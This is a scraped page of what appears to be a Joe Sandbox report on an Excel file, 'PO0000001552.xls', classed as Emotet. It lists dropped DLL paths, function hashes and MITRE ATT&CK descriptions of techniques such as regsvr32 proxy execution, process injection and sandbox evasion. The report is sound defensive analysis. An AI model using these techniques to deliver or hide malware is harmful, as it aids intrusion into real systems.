Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _getptd
String ID: csm
API String ID: 3186804695-1018135373
Opcode ID: 06c3fd111063ce84b499b1a638d3de97d14af7166f4864d1cde499098eb39903
Instruction ID: c198d3b8c50b99521d332af194ff0eb123fde773ee4f620458410d06c37f5f07
Opcode Fuzzy Hash: 06c3fd111063ce84b499b1a638d3de97d14af7166f4864d1cde499098eb39903
Instruction Fuzzy Hash: 02018432F07A4289EB329F22DD616B82364EF5A709F041131D90D0A665CFA8E9C0E780

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO0000001552.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview.ttf

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\E9097BEB-F41B-41FA-A529-2854DCDBD67E

C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\9aad439831564ef9f88438a70a63c87e26ef3852.tbres

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO0000001552.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\elv2.ooocccxxx

C:\Users\user\elv3.ooocccxxx

C:\Windows\System32\GanZhs\FrugrCuQjdEr.dll (copy)

Windows Analysis Report
PO0000001552.xls

Function 009B0000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Function 0000000180001864 Relevance: 7.9, Strings: 6, Instructions: 418
COMMON

Function 0000000180019F38 Relevance: 6.5, Strings: 5, Instructions: 203
COMMON

Function 0000000180012108 Relevance: 6.4, Strings: 5, Instructions: 167
COMMON

Function 0000000180027AE4 Relevance: 5.1, Strings: 4, Instructions: 132
COMMON

Function 00007FFD2B0675D0 Relevance: 4.5, APIs: 3, Instructions: 20
memoryCOMMON

Function 000000018000EB3C Relevance: 4.5, Strings: 3, Instructions: 740
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre